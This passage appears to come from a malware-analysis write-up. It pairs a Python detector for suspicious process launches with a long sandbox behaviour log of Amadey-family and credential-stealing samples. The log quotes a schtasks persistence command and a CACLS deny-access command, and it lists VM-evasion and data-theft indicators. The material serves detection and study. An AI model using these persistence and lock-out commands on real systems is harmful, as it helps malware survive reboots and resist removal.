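        parent, image, argv = ev["parent"], ev["image"], ev["argv"]
        pname, iname = basename(parent), basename(image)
        lowargs = [a.lower() for a in argv]
        # 1. schtasks /Create pointing at a binary in a user-writable location
        if iname == "schtasks.exe" and "/create" in lowargs:
            target = flag_value(argv, "/tr")
            if target and user_writable(target):
                findings.append({"kind": "scheduled_task", "target": target, "parent": parent,
                                 "schedule": f"{flag_value(argv, '/sc')} {flag_value(argv, '/mo')}"})
        # 2. CACLS /P <principal>:N denies the principal all access to the object
        if iname == "cacls.exe" and (flag_value(argv, "/p") or "").lower().endswith(":n"):
            findings.append({"kind": "acl_deny", "target": argv[1] if len(argv) > 1 else "",
                             "parent": parent})
        # 3. explorer.exe launching a binary from the user profile (injected host process)
        if pname == "explorer.exe" and user_writable(image):
            findings.append({"kind": "explorer_spawn", "target": image, "parent": parent})
        # 4. a process starting a new copy of its own image name
        if pname == iname and iname != "unknown":
            findings.append({"kind": "same_image_spawn", "target": image, "parent": parent})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f["kind"], f["target"], "<-", f["parent"])
```

The same four checks translate directly to endpoint telemetry (Sysmon event 1 or Windows 4688 with command-line logging): parent image, child image and parsed arguments are the only fields used.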
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2B4A.tmp
Source: 86EE.exe, 0000002D.00000003.493869220.00000000273B2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.492502087.00000000273B2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE offer_eligible_instrument ( offer_id UNSIGNED LONG,instrument_id UNSIGNED LONG),;' 4;'*
Source: 86EE.exe, 0000002D.00000003.490197880.00000000273B4000.00000004.00000800.00020000.00000000.sdmp, 95786452850497366982696300.45.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\816F.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B48AD6 CreateToolhelp32Snapshot,Module32First, 11_2_00B48AD6
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\E3ECD25DF9
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Command line argument: 08A 12_2_00413780
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'CreateDecryptor'
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'CreateDecryptor'
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/GetRemoveMethodSetRange.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: S2XJ2wbz7u.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\lulubob99\yu.pdb source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 3790.exe, 0000000D.00000002.412472703.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, 3790.exe, 0000000D.00000002.415736878.0000000000870000.00000040.00001000.00020000.00000000.sdmp, 3790.exe, 0000000D.00000003.404528480.00000000008B0000.00000004.00001000.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.520940016.0000000000400000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr
Source: Binary string: /.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ?C:\lulubob99\yu.pdbQ source: 3790.exe, 0000000D.00000000.396647319.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, rovwer.exe, 0000000F.00000000.410516994.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000002.519144240.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, rovwer.exe, 0000001C.00000000.438994801.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, 3790.exe.1.dr, rovwer.exe.13.dr
Source: Binary string: _.pdb source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\android.annotation.TestApi.module1 - Copy.pdb source: 816F.exe, 0000001A.00000000.437232628.0000000000192000.00000002.00000001.01000000.00000011.sdmp, 816F.exe.1.dr
Source: Binary string: (P&gHC:\Windows\System.ServiceModel.pdb source: 2B4A.exe, 0000000C.00000002.517632493.0000000000197000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\tahaf\to.pdbQ source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: C:\tahaf\to.pdb source: S2XJ2wbz7u.exe, tiddsjj.1.dr
Source: Binary string: SC:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: C:\vum\nuzuyo.pdb source: 2B4A.exe, 0000000C.00000000.390215303.0000000000401000.00000020.00000001.01000000.00000009.sdmp, 2B4A.exe.1.dr
Source: Binary string: @C:\cekezuca_v.pdb source: 6644.exe, 00000013.00000000.423486676.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, 6644.exe.1.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Unpacked PE file: 0.2.S2XJ2wbz7u.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\tiddsjj Unpacked PE file: 11.2.tiddsjj.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Unpacked PE file: 12.2.2B4A.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\3790.exe Unpacked PE file: 13.2.3790.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Unpacked PE file: 15.2.rovwer.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\6644.exe Unpacked PE file: 19.2.6644.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
Source: 816F.exe.1.dr, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs .Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 26.0.816F.exe.190000.0.unpack, RequireDashesIsolatedStoragePermissionAttribute/SpecialNameAttributeSByteArrayTypeInfo.cs .Net Code: IIDIEnumSTOREDEPLOYMENTMETADATAPROPERTYsetNextActivator System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00401268 push cs; iretd 0_2_00401269
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00402B84 push esp; iretd 0_2_00402B85
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040CE34 pushad ; iretd 0_2_0040CE37
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_00412698 push ss; ret 0_2_00412699
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Code function: 0_2_0040CF10 push edi; iretd 0_2_0040CF11
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00401268 push cs; iretd 11_2_00401269
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00402B84 push esp; iretd 11_2_00402B85
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040CE34 pushad ; iretd 11_2_0040CE37
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00412698 push ss; ret 11_2_00412699
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_0040CF10 push edi; iretd 11_2_0040CF11
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_009312CF push cs; iretd 11_2_009312D0
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00931790 push 81396969h; iretd 11_2_00931797
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4F02F push edi; ret 11_2_00B4F036
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4EE1A push edx; retf 11_2_00B4EE1B
Source: C:\Users\user\AppData\Roaming\tiddsjj Code function: 11_2_00B4BA58 push es; retf 11_2_00B4BA5A
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C40C push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00407CE6 push 8B0041E4h; retf 12_2_00407CF1
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C50E push cs; iretd 12_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0040E21D push ecx; ret 12_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_0041C6BE push ebx; ret 12_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: 59FE.exe.1.dr Static PE information: section name: _RDATA
Source: 86EE.exe.1.dr Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: cred64[1].dll.15.dr Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 59FE.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x31822d
Source: cred64.dll.15.dr Static PE information: real checksum: 0x0 should be: 0x26b56
Source: 8C00.exe.1.dr Static PE information: real checksum: 0xae41 should be: 0x5a5ca
Source: initial sample Static PE information: section name: .text entropy: 7.881559830047924

Persistence and Installation Behavior

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\tiddsjj
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\59FE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\86EE.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\453D.exe
Source: C:\Users\user\AppData\Local\Temp\3790.exe File created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6644.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2B4A.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe File created: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\816F.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8C00.exe
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6CEC.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3790.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Hooking and other Techniques for Hiding and Protection

Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\s2xj2wbz7u.exe
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\tiddsjj:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3790.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\6644.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\816F.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: tiddsjj, 0000000B.00000002.378719538.0000000000B57000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK
Source: vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64
Source: C:\Users\user\AppData\Local\Temp\453D.exe File opened: C:\Users\user\AppData\Local\Temp\0.txt count: 74827
Source: C:\Users\user\Desktop\S2XJ2wbz7u.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\tiddsjj Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\explorer.exe TID: 2136 Thread sleep count: 646 > 30
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep count: 448 > 30
Source: C:\Windows\explorer.exe TID: 4760 Thread sleep time: -44800s >= -30000s
Source: C:\Windows\explorer.exe TID: 5040 Thread sleep count: 300 > 30
Source: C:\Windows\explorer.exe TID: 5040 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1336 Thread sleep count: 454 > 30
Source: C:\Windows\explorer.exe TID: 4116 Thread sleep count: 282 > 30
Source: C:\Windows\explorer.exe TID: 4044 Thread sleep count: 257 > 30
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 5456 Thread sleep time: -510000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 160 Thread sleep time: -50000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 244 Thread sleep time: -1260000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe TID: 3424 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\59FE.exe TID: 2888 Thread sleep time: -37000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\6644.exe TID: 1920 Thread sleep count: 198 > 30
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe TID: 1096 Thread sleep count: 9999 > 30
Source: C:\Users\user\AppData\Local\Temp\816F.exe TID: 5396 Thread sleep count: 389 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep count: 162 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep time: -97200000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5004 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\59FE.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6644.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 12_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 360000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 646
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 448
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 454
Source: C:\Users\user\AppData\Local\Temp\6CEC.exe Window / User API: threadDelayed 9999
Source: C:\Users\user\AppData\Local\Temp\816F.exe Window / User API: threadDelayed 389
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\PingboardCache\argq.exe
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key enumerated: More than 140 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 50000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe Thread delayed: delay time: 360000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 816F.exe, 0000001A.00000002.533641862.0000000000844000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\w
Source: rovwer.exe, 0000000F.00000002.559360064.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.531130327.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000001.00000000.320883959.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: 2B4A.exe, 0000000C.00000002.553806034.0000000000870000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
Source: rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8e
Source: explorer.exe, 00000001.00000000.316628124.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Ven_NECVMWar&Prod_VMware_SAT
